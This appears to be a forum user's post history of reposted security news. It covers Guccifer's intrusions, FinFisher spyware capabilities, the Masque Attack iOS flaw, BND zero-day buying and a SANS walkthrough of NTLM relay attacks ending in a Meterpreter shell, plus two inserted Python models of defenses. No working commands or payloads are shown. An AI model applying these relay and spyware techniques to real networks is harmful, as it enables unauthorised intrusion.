Everything posted by Nytro
-
[h=2]DuckDuckGo in Firefox[/h]
Posted by yegg (DuckDuckGo staff)

We're excited to announce that DuckDuckGo is now included as a pre-installed search option in Firefox! Today is Firefox's 10th anniversary and with it comes a special release that includes DuckDuckGo. The DuckDuckGo and Firefox communities have always had a shared interest in privacy, so we're very proud to be included and can't wait to see what we can accomplish! To use DuckDuckGo in Firefox, simply download the latest version and select us from the search dropdown.

Source: https://duck.co/blog/firefox
-
"Micul Fum" and great luck. How Guccifer managed to break into Corina Crețu's account and put the fear into the Bush family
11 November 2014, 16:12, by Octavian Palade

Romanian hacker Guccifer became known after scaring several celebrities and names from Romanian and international politics. Now he is behind bars, where he was interviewed by "New York Times" reporters. In an article titled "For Guccifer, Hacking Was Easy. Prison Is Hard.", Marcel-Lehel Lazăr, the man behind the Guccifer pseudonym, told his story. He was caught on 22 January this year, after managing to fool FBI agents for two years. "I was expecting them, but the shock was very big for me. It's hard to be a hacker, but it's even harder to cover all your tracks," Guccifer told the "New York Times" from the Arad penitentiary. He has to serve a seven-year sentence.

Before becoming Guccifer, a name that comes from "the style of Gucci and the light of Lucifer", Marcel was a taxi driver. The 47-year-old had been unemployed for several years and had no technical knowledge or sophisticated equipment. From behind a tired computer, Marcel quickly learned a new trade. In many ways, he showed everyone how easy it is to be a criminal on the Internet and how you can stay one step ahead of law enforcement if you have some rudimentary knowledge. "He wasn't really a hacker, just a very clever, very patient and very persistent guy," said Viorel Badea, the prosecutor who handled the case.

Guccifer is known for having made public a series of self-portraits painted by former US president George W. Bush, for having shown everyone the "flirtations" between Corina Crețu, a member of the European Parliament, and Colin Powell, and also for having obtained numerous photos and private messages of national and international celebrities. "This is just a poor Romanian who wanted to be famous," Badea added.

Lazăr managed to break into all the accounts by guessing the passwords of each targeted person. Instead of using sophisticated viruses or other tools specific to cybercriminals, he searched the Internet for as much information as possible about his targets, information he then used to answer the security questions needed to obtain a password. To crack Corina Crețu's password, he struggled for six months. The "trick" was not new for the man from Arad. Lazăr had already served prison time in 2011, after, under the pseudonym "Micul Fum" ("Little Smoke"), he accessed, in the same way, the personal accounts of local celebrities such as Bianca Drăgușanu, Laura Cosoi, Corina Caragea or Dragoș Moștenescu.

Despite the 2011 conviction, Guccifer showed arrogance and believed he would never be caught. On 6 June 2013, he started bragging on the website of the American publication "The Smoking Gun", leaving a comment in broken English. "I'm not worried. I think I'll change proxies, play backgammon on Yahoo, watch TV and play with my daughter and the rest of my family," he wrote. A day later, however, an announcement by SRI chief George Maior put him on edge. Maior declared that he would soon capture "Little Guccifer". Lazăr believed that the Romanian authorities had made the connection between "Micul Fum" and "Guccifer", so he began smashing his computer components to pieces, in a desperate attempt to cover his tracks. Maior later said that at the time he made the announcement he did not know the hacker had been caught before, and admitted he was only trying to minimize his importance.

What was, after all, the reason Guccifer acted the way he did? He did not steal any money and did not try to blackmail anyone. It seems to be a large dose of paranoia. "The world is run by a group of conspirators, called the Illuminati Council, made up of very rich people, noble families, bankers," he argued in his defence, in a handwritten manifesto he read to reporters. He said he had no interest in breaking into celebrities' accounts, but simply happened to come across them while trying to get into other people's private lives. Now, Guccifer shares his cell with four other people and has no access to a computer. All his thoughts and conspiracy theories he writes by hand in a notebook. "I broke the law, but to serve seven years in a maximum security prison? I'm not a criminal or a thief. What I did was right," he added.

Source: "Micul Fum" și marele noroc. Cum a reușit Guccifer să spargă contul Corinei Crețu și să bage spaima în familia Bush | adevarul.ro
-
Inside FinFisher: examining the intrusive toolset
On November 10, 2014 | Posted by Sohail Abid | In Blog | Tags: FinFisher

FinFisher, a company known for making and selling a wide range of spy software to world governments for large sums of money, was hacked in the first week of August this year. The anonymous hackers leaked a 40GB torrent including the entire FinFisher support portal, with obfuscated information about the buyers, the list of software they had purchased, the duration of each license, and their communication with the support staff. The leak helped human rights activists around the world identify the buyers, hold their governments to account for the purchases, and question the necessity of such a measure. Digital Rights Foundation also released a report detailing the evidence of Pakistan's purchase of three pieces of software from FinFisher.

The leak generated a lot of buzz, and rightly so. But the coverage from mainstream media and human rights organizations was primarily limited to reporting the leak, identifying the buyers, and the potential human rights implications. There hasn't been in-depth coverage of the scope and capabilities of the whole set of software FinFisher sells. This is what we intend to do in the current article.

Understanding FinFisher

FinFisher is not just a piece of software. It's a well-thought-out and sophisticated toolset, comprising both software and hardware, built from the ground up to gain access to people's private data and communications. Well thought out in the sense that each tool complements the others in breaking into someone's communication, and sophisticated in the way the tools are generally invisible to the person.

An overview of the FinFisher toolset.

At the time of the leak, FinFisher had 12 products available on its website: ten hardware+software solutions to break into computers and mobiles, a repository of 0-day and 1-day exploits that can be used to infect the target systems, and a training program. Among these solutions, FinSpy is the jewel of the crown. It is a remote monitoring solution that basically lets the buyer see everything someone does on their computer.

How Do They Break In

It is easier if they, or anyone they know, have access to the computer. FinFisher offers three solutions for this situation. Two of them (FinUSB Suite and FinFly USB) involve attaching a USB drive to the computer; it does not matter if the computer is shut down or logged in, password protected or not. Once the USB is attached, the system becomes compromised. The third one (FinFireWire) is a set of adapter cards (FireWire/1394, PCMCIA and ExpressCard) and associated cables that, when attached, give access to a running but password-protected Mac, Windows, or Linux computer.

Four FinFisher solutions are designed for situations when they don't have physical access to someone's computer. FinFly Net consists of a small portable computer that is attached to the router of a hotel or airport or any other "friendly" place, and a laptop. Once the FinFly Net computer is The management laptop can then see the internet traffic being sent and received by the people attached to the network. It can also display a fake software upgrade notification to the target, which when installed gives complete access to that computer. Since this solution sits between all internet traffic going to and from the people connected to the network, it is also capable of inserting a software update (Adobe Flash, for example) notification on a legitimate website. FinFly LAN can also attach spying software to legitimate files on the fly, while being on the same wired or wireless network.

FinFly Web creates fake websites which make use of loopholes in web browsers to instantly install FinSpy, the crown jewel in the FinFisher toolset. FinFly ISP is a hardware solution deployed at an ISP to covertly install spy software on any computer in a city or country. This solution is able to "patch" any legitimate files being downloaded by people with spying software. Like FinFly Net, it can also issue fake upgrade notifications for popular software like iTunes. The computer becomes compromised as soon as the downloaded files are run or the software upgrade is applied. FinIntrusion Kit is an advanced toolkit that includes a customized Linux laptop with a host of adapters and antennas and can break WEP and WPA/WPA2 passphrases.

What Can They See

A lot. But let's go through it step by step.

IN CASE OF PHYSICAL ACCESS

The FinUSB toolkit can extract login credentials from common programs like email clients, chat messengers, and remote desktop tools. It can also silently copy recently opened, created, or edited files from the computer, as well as browsing history, chat logs, and wifi passwords. FinFireWire, after bypassing the login or lock screen, can recover passwords from RAM and copy all files onto an external drive.

IN CASE OF CLOSE PROXIMITY LIKE AIRPORTS OR HOTELS

FinIntrusion Kit, which only requires the target to be on the same network, such as at an airport or hotel, can capture usernames and passwords being entered on websites, in addition to any other internet traffic, even if it's on HTTPS. FinFly Net and FinFly LAN lead to the installation of FinSpy, which then gives full access to all data and communications on a system.

IN CASE OF NO PHYSICAL ACCESS OR PROXIMITY

FinFisher provides FinFly ISP and FinFly Web to infect people who are not in close proximity. Once infected, full access to these computers will be granted.

A video detailing how FinFly ISP works.

FinSpy: Jewel of the Crown

Marketed as a 'remote monitoring solution,' FinSpy is the multi-purpose spying software around which the whole company revolves. It opens a backdoor to the infected computer, allowing live access to all files and data. It also enables access to the mic and webcam installed on the computer for "live surveillance." It can also save an audio or video recording of each Skype call and send it to the buyer. And it can, FinFisher flaunts, "bypass almost 40 regularly tested antivirus systems."

FinSpy Control Center. Note the area in red: those are the actions that can be taken on an infected computer.

We have a saying in Punjabi to seek refuge from something terrible: May this not happen even to my enemy. I'll end this post at that.

About the author: Sohail Abid researches surveillance and censorship issues at Digital Rights Foundation. Before joining DRF, he was CTO at Jumpshare, a file sharing startup from Pakistan.

Source: Inside FinFisher: examining the intrusive toolset | Digital Rights Foundation
-
[h=2]Masque Attack: All Your iOS Apps Belong to Us[/h]
November 10, 2014 | By Hui Xue, Tao Wei and Yulong Zhang | Exploits, Mobile Threats, Targeted Attack, Threat Intelligence, Threat Research, Vulnerabilities

In July 2014, FireEye mobile security researchers discovered that an iOS app installed using enterprise/ad-hoc provisioning could replace another genuine app installed through the App Store, as long as both apps used the same bundle identifier. This in-house app may display an arbitrary title (like "New Flappy Bird") that lures the user to install it, but the app can replace another genuine app after installation. All apps can be replaced except iOS preinstalled apps, such as Mobile Safari. This vulnerability exists because iOS doesn't enforce matching certificates for apps with the same bundle identifier. We verified this vulnerability on iOS 7.1.1, 7.1.2, 8.0, 8.1 and 8.1.1 beta, for both jailbroken and non-jailbroken devices. An attacker can leverage this vulnerability both through wireless networks and USB. We named this attack "Masque Attack," and have created a demo video.

We notified Apple about this vulnerability on July 26. Recently Claud Xiao discovered the "WireLurker" malware. After looking into WireLurker, we found that it started to utilize a limited form of Masque Attack to attack iOS devices through USB. Masque Attacks can pose much bigger threats than WireLurker. Masque Attacks can replace authentic apps, such as banking and email apps, with the attacker's malware through the Internet. That means the attacker can steal a user's banking credentials by replacing an authentic banking app with malware that has an identical UI. Surprisingly, the malware can even access the original app's local data, which wasn't removed when the original app was replaced. This data may contain cached emails, or even login tokens which the malware can use to log into the user's account directly. We have seen proof that this issue has started to circulate.

In this situation, we consider it urgent to let the public know, since there could be existing attacks that haven't been found by security vendors. We are also sharing mitigation measures to help iOS users better protect themselves.

[h=2]Security Impacts[/h]
By leveraging Masque Attack, an attacker can lure a victim to install an app with a deceiving name crafted by the attacker (like "New Angry Bird"), and the iOS system will use it to replace a legitimate app with the same bundle identifier. Masque Attack couldn't replace Apple's own platform apps such as Mobile Safari, but it can replace apps installed from the App Store. Masque Attack has severe security consequences:

Attackers could mimic the original app's login interface to steal the victim's login credentials. We have confirmed this through multiple email and banking apps, where the malware uses a UI identical to the original app to trick the user into entering real login credentials and uploads them to a remote server.

We also found that data under the original app's directory, such as local data caches, remained in the malware's local directory after the original app was replaced. The malware can steal this sensitive data. We have confirmed this attack with email apps, where the malware can steal local caches of important emails and upload them to a remote server.

The MDM interface couldn't distinguish the malware from the original app, because they used the same bundle identifier. Currently there is no MDM API to get the certificate information for each app. Thus, it is difficult for MDM to detect such attacks.

As mentioned in our Virus Bulletin 2014 paper "Apple without a shell - iOS under targeted attack", apps distributed using enterprise provisioning profiles (which we call "EnPublic apps") aren't subjected to Apple's review process. Therefore, the attacker can leverage iOS private APIs for powerful attacks such as background monitoring (CVE-2014-1276) and mimic iCloud's UI to steal the user's Apple ID and password. The attacker can also use Masque Attacks to bypass the normal app sandbox and then get root privileges by attacking known iOS vulnerabilities, such as the ones used by the Pangu team.

[h=2]An Example[/h]
In one of our experiments, we used an in-house app with the bundle identifier "com.google.Gmail" and the title "New Flappy Bird". We signed this app using an enterprise certificate. When we installed this app from a website, it replaced the original Gmail app on the phone.

Figure 1

Figure 1 illustrates this process. Figure 1(a) and (b) show the genuine Gmail app installed on the device with 22 unread emails. Figure 1(c) shows that the victim was lured to install an in-house app called "New Flappy Bird" from a website. Note that "New Flappy Bird" is the title for this app and the attacker can set it to an arbitrary value when preparing the app. However, this app has the bundle identifier "com.google.Gmail". After the victim clicks "Install", Figure 1(d) shows the in-house app replacing the original Gmail app during the installation. Figure 1(e) shows that the original Gmail app was replaced by the in-house app. After installation, when opening the new "Gmail" app, the user will be automatically logged in with almost the same UI, except for a small text box at the top saying "yes, you are pwned", which we designed to easily illustrate the attack. Attackers won't show such courtesy in real-world attacks. Meanwhile, the original authentic Gmail app's locally cached emails, which were stored as clear text in a sqlite3 database as shown in Figure 2, are uploaded to a remote server. Note that Masque Attack happens completely over the wireless network, without relying on connecting the device to a computer.
Figure 2

[h=2]Mitigations[/h]
iOS users can protect themselves from Masque Attacks by following three steps:

1. Don't install apps from third-party sources other than Apple's official App Store or the user's own organization.
2. Don't click "Install" on a pop-up from a third-party web page, as shown in Figure 1(c), no matter what the pop-up says about the app. The pop-up can show attractive app titles crafted by the attacker.
3. When opening an app, if iOS shows an alert with "Untrusted App Developer", as shown in Figure 3, click on "Don't Trust" and uninstall the app immediately.

Figure 3

To check whether there are apps already installed through Masque Attacks, iOS 7 users can check the enterprise provisioning profiles installed on their iOS devices, which indicate the signing identities of possible malware delivered by Masque Attacks, by checking "Settings -> General -> Profiles" for "PROVISIONING PROFILES". iOS 7 users can report suspicious provisioning profiles to their security department. Deleting a provisioning profile will prevent enterprise-signed apps which rely on that specific profile from running. However, iOS 8 devices don't show provisioning profiles already installed on the device, and we suggest taking extra caution when installing apps.

We disclosed this vulnerability to Apple in July. Because all the existing standard protections or interfaces by Apple cannot prevent such an attack, we are asking Apple to provide more powerful interfaces to professional security vendors to protect enterprise users from these and other advanced attacks.

We thank FireEye team members Noah Johnson and Andrew Osheroff for their help in producing the demo video. We also want to thank Kyrksen Storer and Lynn Thorne for their help improving this blog. Special thanks to Zheng Bu for his valuable comments and feedback.

Tagged: iOS Vulnerability, Masque Attack, WireLurker.

Source: Masque Attack: All Your iOS Apps Belong to Us | FireEye Blog
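The missing check the FireEye post describes (iOS matched apps by bundle identifier only, never by signing certificate, and left the old app's data container in place) can be modelled in a few lines. The following Python is an added example written for this page, not FireEye's code or anything from iOS: apps are plain records, `signer` stands for the identity in the code-signing certificate, `data` for the app's local container, and the bundle id, titles, the 22 cached emails and the signer ids (`ENTERPRISE-TEAM-X`, `OUR-ORG-TEAM`) are constructed placeholders. It shows the vulnerable install policy beside a hardened one that also compares signers, plus the check the post's "look at your provisioning profiles" advice amounts to.

```python
"""Model of the install decision behind Masque Attack (added example, not
FireEye's code). ``signer`` stands for the code-signing identity, ``data``
for the app's local container. All names and ids are constructed."""
from dataclasses import dataclass, field

APP_STORE = "Apple App Store"


@dataclass
class App:
    bundle_id: str
    title: str
    signer: str
    data: dict = field(default_factory=dict)


class Device:
    """Installed apps keyed by bundle identifier, the way iOS keys them."""

    def __init__(self, org_signers=()):
        self.installed = {}
        self.org_signers = set(org_signers)   # the user's own enterprise identities

    def install_vulnerable(self, new: App) -> str:
        """Behaviour the post describes: a matching bundle id is enough to
        replace the installed app, the certificate is never compared, and the
        old app's local data container survives the replacement."""
        old = self.installed.get(new.bundle_id)
        if old is not None:
            new.data = old.data           # cached emails, tokens, etc. carry over
        self.installed[new.bundle_id] = new
        return "replaced" if old else "installed"

    def install_hardened(self, new: App) -> str:
        """Policy iOS lacked at the time: an app with a bundle id that is
        already installed may only replace it when the signer matches too."""
        old = self.installed.get(new.bundle_id)
        if old is not None and old.signer != new.signer:
            return "refused: bundle id already installed under a different signer"
        if old is not None:
            new.data = old.data
        self.installed[new.bundle_id] = new
        return "replaced" if old else "installed"

    def suspicious_apps(self) -> list:
        """Apps signed by neither the App Store nor the user's organization;
        these are the ones an enterprise provisioning profile would reveal."""
        return sorted(a.bundle_id for a in self.installed.values()
                      if a.signer != APP_STORE and a.signer not in self.org_signers)


def genuine_gmail() -> App:
    # constructed: mirrors Figure 1(a), 22 unread emails in the local cache
    return App("com.google.Gmail", "Gmail", APP_STORE, data={"cached_emails": 22})


def lure_app() -> App:
    # same bundle id, arbitrary title, enterprise certificate the user's
    # organization does not own ("ENTERPRISE-TEAM-X" is a placeholder)
    return App("com.google.Gmail", "New Flappy Bird", "ENTERPRISE-TEAM-X")


def scenario(hardened: bool) -> dict:
    """Install the lure on a device that already has the genuine app and
    report what ended up under the Gmail bundle id."""
    dev = Device(org_signers={"OUR-ORG-TEAM"})   # placeholder org identity
    dev.install_hardened(genuine_gmail())
    install = dev.install_hardened if hardened else dev.install_vulnerable
    outcome = install(lure_app())
    now = dev.installed["com.google.Gmail"]
    return {"outcome": outcome, "title": now.title, "signer": now.signer,
            "data": now.data, "suspicious": dev.suspicious_apps()}


if __name__ == "__main__":
    print("vulnerable:", scenario(False))
    print("hardened:  ", scenario(True))
```

In the vulnerable run the lure ends up registered as `com.google.Gmail`, signed by the foreign enterprise identity, with the genuine app's cached emails readable from its container, exactly the data-leak path the post confirms with email apps; `suspicious_apps()` flags it because its signer is neither the App Store nor the organization's own. In the hardened run the install is refused and the App Store copy stays in place.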
-
German spies want millions of Euros to buy zero-day code holes
Because once we own them, nobody else can ... oh, wait
By Richard Chirgwin, 11 Nov 2014

Germany's spooks have come under fire for reportedly seeking funds to find bugs – not to fix them, but to hoard them. According to the Süddeutsche Zeitung, the country's BND – its federal intelligence service – wants €300 million in funding for what it calls the Strategic Technical Initiative. The Local says €4.5 million of that will be spent seeking bugs in SSL and HTTPS.

The BND is shopping for zero-day bugs not to fix them, but to exploit them, the report claims, and that's drawn criticism from NGOs, the Pirate Party, and the Chaos Computer Club (CCC). German Pirate Party president Stefan Körner told The Local people should fear governments more than cyber-terror. Körner is also critical of the strategy on the basis that governments shouldn't be helping fund the grey market for security vulnerabilities, a sentiment echoed by the CCC. The CCC's Dirk Engling called the proposal legally questionable and damaging to the German economy.

The SZ report also points out the serious risk that a zero-day bought on the black market will also be available for purchase by criminals for exploitation.

The BND proposal would seem to put it at odds with America's NSA, which put its hand on its heart last week and promised that it shares "most" of the bugs it finds so they can be fixed. (The Register can't help but wonder if a partner agency hoarding bugs would be resisted by the NSA, or if it provides an escape clause to the promise to share bugs.)

The BND also wants to spend €1.1 million to set up a honey-pot, and is in the early stages of conducting social network analysis, with a prototype program slated for completion by June 2015.

Source: German spies want millions of Euros to buy zero-day code holes • The Register
-
There's also XenForo, but I don't know very much about it.
-
SMB Relay Demystified and NTLMv2 Pwnage with Python
Posted by eskoudis | Filed under Metasploit, Methodology, Passwords, Python
By Mark Baggett

[Editor's Note: In this _excellent_ article, Mark Baggett explains in detail how the very powerful SMBRelay attack works and offers tips for how penetration testers can operationalize around it. And, better yet, about 2/3rds of the way in, Mark shows how you can use a Python module to perform these attacks in an environment that uses only NTLMv2, a more secure Windows authentication mechanism. Really good stuff! --Ed.]

The SMB Relay attack is one of those awesome tactics that really helps penetration testers demonstrate significant risk in a target organization; it is reliable, effective, and almost always works. Even when the organization has good patch management practices, the SMB Relay attack can still get you access to critical assets. Most networks have several automated systems that connect to all the hosts on the network to perform various management tasks. For example, software inventory systems, antivirus updates, nightly backups, software updates and patch management, desktop backups, event log collectors, and other processes will routinely connect to every host on the network, log in with administrative credentials and perform some management function. In some organizations, active defense systems such as antivirus rogue host detection will immediately attempt to log in to any host that shows up on the network. These systems will typically try long lists of administrative usernames and passwords as they try to gain access to the unknown host that has mysteriously appeared on the network. SMB Relay attacks allow us to grab these authentication attempts and use them to access systems on the network. In a way, SMB Relays are the network version of Pass the Hash attacks (which Ed Skoudis described briefly in the context of psexec in his Pen Tester's Pledge article). Let's look at how these attacks work.

NTLM is a challenge/response protocol. The authentication happens something like this: First, the client attempts to log in and the server responds with a challenge. In effect the server says, "If you are who you say you are, then encrypt this thing (Challenge X) with your hash." Next, the client encrypts the challenge and sends back the encrypted challenge response. The server then attempts to decrypt that encrypted challenge response with the user's password hash. If it decrypts to reveal the challenge that it sent, then the user is authenticated.

Here is an illustration of a challenge/response authentication.

With SMB Relay attacks, the attacker inserts himself into the middle of that exchange. The attacker selects the target server he wants to authenticate to and then waits for someone on the network to authenticate to his machine. This is where rogue host detection, vulnerability scanners, and administrator scripts that automatically authenticate to hosts become a penetration tester's best friends. When the automated process connects to the attacker, he passes the authentication attempt off to his target (another system on the network, perhaps a server). The target generates a challenge and sends it back to the attacker. The attacker sends the challenge back to the originating scanning system. The scanning system encrypts the challenge with the correct password hash and sends it to the attacker. The attacker passes the correctly encrypted response back to his target and successfully authenticates. This process is shown in the next illustration. The BLUE arrows are the original communications and the RED arrows are slightly modified versions of those communications that the attacker is relaying to his target, so that he can gain access to it.

Although this may seem complicated, it is actually very easy to exploit. In this example, the attacker (let's say he's at IP address 10.10.12.10) wants to gain access to the server at the IP address 10.10.12.20 (perhaps a juicy file server). There is a nightly software inventory process on the server at 10.10.12.19 that inventories all the hosts on the network.

Scenario
Attacker IP - 10.10.12.10
Target IP - 10.10.12.20
Nightly Inventory Scanner IP - 10.10.12.19

Metasploit has an SMB Relay module and it works wonderfully. The attacker at 10.10.12.10 sets up Metasploit as follows:

I'll use a simple Windows FOR loop to simulate an administrative server scanning the network and doing inventory. On host 10.10.12.19 I run the following command.

When the scanner (10.10.12.19) connects to 10.10.12.10 (our Metasploit listener), the authentication attempt is relayed to the target server (10.10.12.20). The relayed authentication happens like magic and Metasploit automatically uses the authenticated SMB session to launch the meterpreter payload on the target. Notice in the figure below that Metasploit sends an "Access Denied" back to the inventory scanner when it attempted to connect to 10.10.12.10. However, the damage is done and we get a Meterpreter shell on the attacker's machine running on the target (10.10.12.20).

Today, Metasploit's SMB Relay only supports NTLMv1, so organizations can protect themselves from this attack by changing the AD policy from this setting (available in secpol.msc) ...

To this...

After we make the change to NTLMv2, we try Metasploit again. Now when we run the exploit, Metasploit gets a "Failed to authenticate" error message. DRAT, our dastardly plan has been foiled by modern security protocols. Metasploit has support for NTLMv2 in other exploits such as http_ntlmrelay, so I imagine this exploit will eventually support NTLMv2. But, don't worry. We've got you covered. Until then, it is PYTHON TO THE RESCUE!

Two weeks ago, I showed you psexec.py in my blog post about using a Python version of psexec (SANS Penetration Testing | Psexec Python Rocks! | SANS Institute). It is a Python implementation of psexec that is distributed with the IMPACKET modules. The team writing the IMPACKET module for Python is doing some really awesome work. First of all, the modules they have written are awesome. Beyond that, they have created several example programs that demonstrate the power of their Python modules. Best of all, the SMBRELAYX.PY script that comes with IMPACKET supports NTLMv2! Sweetness, thy name is IMPACKET!

Getting the script running will take a little bit of work. You'll need to download the latest version of IMPACKET and fix the module paths to get it up and running. To fix this, I put all of the examples in the same directory as the other modules and then change the import statements to reflect the correct directories.

SMBRELAYX needs an executable to run on the remote host after it authenticates. What could be better than the meterpreter? Let's use msfpayload to create a Meterpreter EXE and then set up SMBRELAYX. smbrelayx.py requires two parameters: -h is the host you are going to attack and -e is the process to launch on the remote host. You just provide those options and sit back and wait for that inventory scanner to connect to your system. Below, I show msfpayload creating the Meterpreter executable, and the invocation of smbrelayx.py:

Because we are using a meterpreter reverse shell, we also have to set up Metasploit so that it is ready to receive the payload connection after it executes on the target. That is what the multi/handler exploit is for, as shown below:

Now, I'll simulate the scanner by attempting to connect to the C$ of our attacker's Linux box (10.10.12.10) from the scanner server (10.10.12.19). Instead of getting back an "Access Denied" like we did from Metasploit, we get back a "System cannot find the path specified" error.

I like this error message. I think a system admin might question why his username and password didn't work on a target before he would question why the path doesn't exist. The smbrelayx.py script's message back to the admin therefore seems more subtle than the Metasploit message and less likely to get noticed.

Immediately we see the relay occur in the Python script. It authenticates to 10.10.12.20 and launches the meterpreter process as a service using the username and password provided by 10.10.12.19. The payload is delivered to the target after authenticating over NTLMv2 and meterpreter is launched on the target. To keep our shell, we need to quickly migrate to another, more stable process (to help automate that migration, we could use one of the migration scripts available for the meterpreter).

Ah, the delicious smell of a brand new meterpreter shell. And of course, because it is a Python module, you can incorporate this script into your own automated attack tools.

Would you like more information about how you can create your own Python-powered attack tools? I'm sure you do! Join me for my brand-new SANS course, SEC573 Python for Penetration Testers: Python for Penetration Testers | Course | Python Penetration Testing

Thank you!
--Mark Baggett

Source: SANS Penetration Testing | SMB Relay Demystified and NTLMv2 Pwnage with Python | SANS Institute
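The article's two lessons, that a relay never needs the password hash because the real client does the "encrypt this challenge" step for it, and that switching to NTLMv2 alone does not help (smbrelayx.py relays NTLMv2 just fine), are easiest to see in a protocol model. The Python below is an added example written for this page; it is not the article's code, not Impacket, and not real NTLM. It stands in for the NT hash, the challenge response and the session key with HMAC-SHA256, reuses the article's constructed scenario (scanner 10.10.12.19, attacker 10.10.12.10, target 10.10.12.20) and a constructed credential, and goes one step beyond the article by modelling the defender's actual fix: SMB signing. The session key is derived from the password hash, so a relay that authenticated by forwarding messages cannot sign the SMB commands it sends afterwards, and a server that requires signing rejects them.

```python
"""Simplified model of NTLM challenge/response, a relay in the middle, and why
SMB signing stops the relay. Toy scheme (HMAC-SHA256), not the real NTLM
algorithm; IPs in comments and the credential are constructed."""
import hashlib
import hmac
import secrets


def password_hash(password: str) -> bytes:
    # stand-in for the NT hash (real NTLM: MD4 over the UTF-16LE password)
    return hashlib.sha256(password.encode("utf-16-le")).digest()


def compute_response(pw_hash: bytes, challenge: bytes) -> bytes:
    # the article's "encrypt this thing (Challenge X) with your hash" step
    return hmac.new(pw_hash, challenge, hashlib.sha256).digest()


def derive_session_key(pw_hash: bytes, response: bytes) -> bytes:
    # keyed by the password hash: only the real client and the server can
    # compute it; a relay only ever sees challenge and response
    return hmac.new(pw_hash, response, hashlib.sha256).digest()[:16]


def sign(session_key: bytes, message: bytes) -> bytes:
    return hmac.new(session_key, message, hashlib.sha256).digest()


class Server:
    """The target file server (10.10.12.20 in the article's scenario)."""

    def __init__(self, accounts: dict, require_signing: bool):
        self.accounts = {u: password_hash(p) for u, p in accounts.items()}
        self.require_signing = require_signing
        self.sessions = {}          # session id -> session key

    def new_challenge(self) -> bytes:
        return secrets.token_bytes(8)

    def authenticate(self, user: str, challenge: bytes, response: bytes):
        pw_hash = self.accounts.get(user)
        if pw_hash is None or not hmac.compare_digest(
                compute_response(pw_hash, challenge), response):
            return None
        session_id = secrets.token_hex(4)
        self.sessions[session_id] = derive_session_key(pw_hash, response)
        return session_id

    def execute(self, session_id: str, command: bytes, signature: bytes) -> str:
        key = self.sessions[session_id]
        if self.require_signing and not hmac.compare_digest(sign(key, command), signature):
            return "rejected: bad signature"
        return "executed: " + command.decode()


class Client:
    """The nightly inventory scanner (10.10.12.19); it holds the real password."""

    def __init__(self, user: str, password: str):
        self.user = user
        self.pw_hash = password_hash(password)
        self.session_key = None

    def respond(self, challenge: bytes) -> bytes:
        response = compute_response(self.pw_hash, challenge)
        self.session_key = derive_session_key(self.pw_hash, response)
        return response


def relay_attack(client: Client, target: Server) -> tuple:
    """The attacker box (10.10.12.10) forwarding the exchange: RED arrows."""
    challenge = target.new_challenge()           # target's challenge, passed to the scanner
    response = client.respond(challenge)         # scanner answers with its real hash
    session = target.authenticate(client.user, challenge, response)
    if session is None:
        return False, "authentication failed"
    # the relay never learned the hash, so it has no session key; the best it
    # can do is sign with a bogus key
    command = b"start-service"
    return True, target.execute(session, command, sign(b"\x00" * 16, command))


def legitimate_use(client: Client, server: Server) -> str:
    """Scanner talking to the server directly: it can sign with its own key."""
    challenge = server.new_challenge()
    response = client.respond(challenge)
    session = server.authenticate(client.user, challenge, response)
    command = b"inventory-query"
    return server.execute(session, command, sign(client.session_key, command))


def run_scenario(require_signing: bool) -> tuple:
    target = Server({"admin": "Winter2014!"}, require_signing)   # constructed credential
    scanner = Client("admin", "Winter2014!")
    return relay_attack(scanner, target)


if __name__ == "__main__":
    print("signing not required:", run_scenario(False))
    print("signing required:    ", run_scenario(True))
```

Note that in both runs the relay authenticates successfully; the NTLM exchange itself cannot tell a forwarded response from a direct one, which is why neither NTLMv1 nor NTLMv2 changes the outcome. Only the signing requirement, checked on every command after authentication, turns the relayed session into a dead end, while `legitimate_use()` shows the real scanner is unaffected because it derives the same session key as the server.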
-
Host a tor server entirely in RAM with Tor-ramdisk
Hacker10 | 7 May, 2012 | Anonymity

Tor-ramdisk is a tiny Linux distribution (5MB) developed by the IT department at D'Youville College (USA) to securely host a tor proxy server in RAM memory. It can run on old diskless hardware and it will stop a forensic analysis by people stealing or seizing a tor server. In the event that a tor server is seized due to ignorance or calculated harassment, and it would not be the first time, the end user would still be safe, because the chained nature of the tor proxy network makes it impossible to find out someone's computer IP by seizing a single server. But other data, even if meaningless, can still be recovered, so running tor in RAM is an extra security step that can help convince people that the machine is merely acting as a relay, as it contains no hard drive.

When a Tor-ramdisk server is powered down all the information is erased with no possibility of recovery. The tor configuration file and private encryption key (torrc & secret_id_key) can be preserved between reboots by exporting and importing them using FTP or SSH, making the life of a tor node operator easy. One disadvantage of running a tor node entirely in RAM memory is that it cannot host hidden services, as that requires hard drive space; other than that, it is a fully functional entry, middle or exit tor node.

I would advise you to block all ports (USB, Firewire) in the server with epoxy; there are computer forensic tools that can be plugged into the USB port and make a copy of the RAM memory on the fly. You might have heard about the cold boot attack, where someone with physical access to a recently switched-off server or computer can still retrieve data remanence from RAM memory; this is not easy to achieve and the recovery timespan is a few seconds.

Visit the Tor-ramdisk homepage: Tor-ramdisk | opensource.dyc.edu

Source: Host a tor server entirely in RAM with Tor-ramdisk | Hacker 10 - Security Hacker
-
ScyllaHide is an advanced open-source x64/x86 usermode Anti-Anti-Debug library. It hooks various functions in usermode to hide debugging. This tool is intended to stay in usermode (ring3). If you need kernelmode (ring0) Anti-Anti-Debug please see TitanHide https://bitbucket.org/mrexodia/titanhide.

ScyllaHide supports various debuggers with plugins:
OllyDbg v1 and v2 OllyDbg v1.10
x64_dbg x64_dbg or https://bitbucket.org/mrexodia/x64_dbg
Hex-Rays IDA v6+ https://www.hex-rays.com/products/ida/
TitanEngine v2 https://bitbucket.org/mrexodia/titanengine-update and TitanEngine | Open Source | ReversingLabs

PE x64 debugging is fully supported with plugins for x64_dbg and IDA.

Please note: ScyllaHide is not limited to these debuggers. You can use the standalone commandline version of ScyllaHide. You can inject ScyllaHide in any process debugged by any debugger.

More information is available in the documentation: https://bitbucket.org/NtQuery/scyllahide/downloads/ScyllaHide.pdf

Source code license: GNU General Public License v3 https://www.gnu.org/licenses/gpl-3.0.en.html

Special thanks to:
What for his POISON Assembler source code https://tuts4you.com/download.php?view.2281
waliedassar for his blog posts waliedassar
Peter Ferrie for his PDFs Homepage of Peter Ferrie
MaRKuS-DJM for OllyAdvanced assembler source code
MS Spy++ style Window Finder MS Spy++ style Window Finder - CodeProject

Source: https://bitbucket.org/NtQuery/scyllahide
-
So, who else is interested? Bucharest. We have ping-pong, billiards and a "fun-room", and weekly football.
-
